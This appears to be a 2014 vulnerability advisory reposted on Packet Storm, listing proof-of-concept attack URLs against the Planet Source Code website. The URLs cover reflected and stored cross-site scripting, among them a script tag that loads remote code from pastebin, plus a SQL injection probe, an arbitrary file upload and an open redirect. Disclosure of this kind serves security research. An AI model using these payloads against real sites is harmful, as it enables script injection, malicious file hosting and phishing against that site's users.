Planet Source code suffers from URL redirection, cross site scripting, remote file upload, and remote SQL injection vulnerabilities.
08ccbd2d051bcbffef50f9d6c06e60df15faee3476135babf9dd60a3950d3d1c#Title : Planet Source Code - Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 15 November 2014
#Category : Web Applications
#Vendor : http://planet-source-code.com
#Greetz : newbie-security.or.id | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber | Madleets
============================================================================================
Remote Cross Site Scripting
Location : vb/scripts/BrowseCategoryOrSearchResults.asp
Parameter : txtCriteria
Reference : https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
POC :
http://planet-source-code.com/vb/scripts/BrowseCategoryOrSearchResults.asp?txtCriteria=[XSS+BYPASS_FILTERING]
Example :
http://planet-source-code.com/vb/scripts/BrowseCategoryOrSearchResults.asp?txtCriteria="><SCRIPT/SRC="http://pastebin.com/raw.php?i=sUHjCcQ1"></SCRIPT>
===========================================================================================
Stored Cross Site Scripting
POC :
1. You Must Register or Login to Planet-Source-Code
2. After Login, Go to Link :
http://planet-source-code.com/vb/jobs/PostJob.asp?lngWId=8
Input your Script Cross Site Scripting at Textbox Job Title,Company,Description
3. View your Cross Script Scripting at :
http://planet-source-code.com/vb/jobs/ListJobs.asp
=============================================================================================
Cross Site Scripting
Location : vb/scripts/voting/VoteLog.asp
Parameter : txtCodeName
POC :
http://planet-source-code.com/vb/scripts/voting/VoteLog.asp?intUserRatingTotal=&lngWid=10&txtCodeName=[YOUR_XSS]&txtCodeId=9431&intNumOfUserRatings=0
Example :
http://planet-source-code.com/vb/scripts/voting/VoteLog.asp?intUserRatingTotal=&lngWid=10&txtCodeName=<script>alert("DevilScreaM")</script>&txtCodeId=9431&intNumOfUserRatings=0
===============================================================================================
Possible SQL Injection
Location : vb/jobs/ListJobs.asp
Parameter : txtMaxNumberOfEntriesPerPage
POC :
http://planet-source-code.com/vb/jobs/ListJobs.asp?txtMaxNumberOfEntriesPerPage=10'
================================================================================================
Arbitrary File Upload
POC :
1. You Must Register or Login to Planet Source Code
2. After Login, Go to Link
http://planet-source-code.com/vb/authors/new_author_login.asp?lngWId=1&blnExisistingAuthor=TRUE
3. Upload your File TXT or HTML in Upload Button
4. After Upload File, see your file at :
http://planet-source-code.com/Upload_PSC/AuthorPhotos/[RANDOME_NAME].html
Example :
http://planet-source-code.com/Upload_PSC/AuthorPhotos/AUTHOR_PHOTO201411151232354597.html
=====================================================================================================
URL Redirection
POC :
http://planet-source-code.com/vb/authentication/DeleteCookies.asp?txtReturnURL=[URL]
Example :
http://planet-source-code.com/vb/authentication/DeleteCookies.asp?txtReturnURL=http://newbie-security.or.id/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed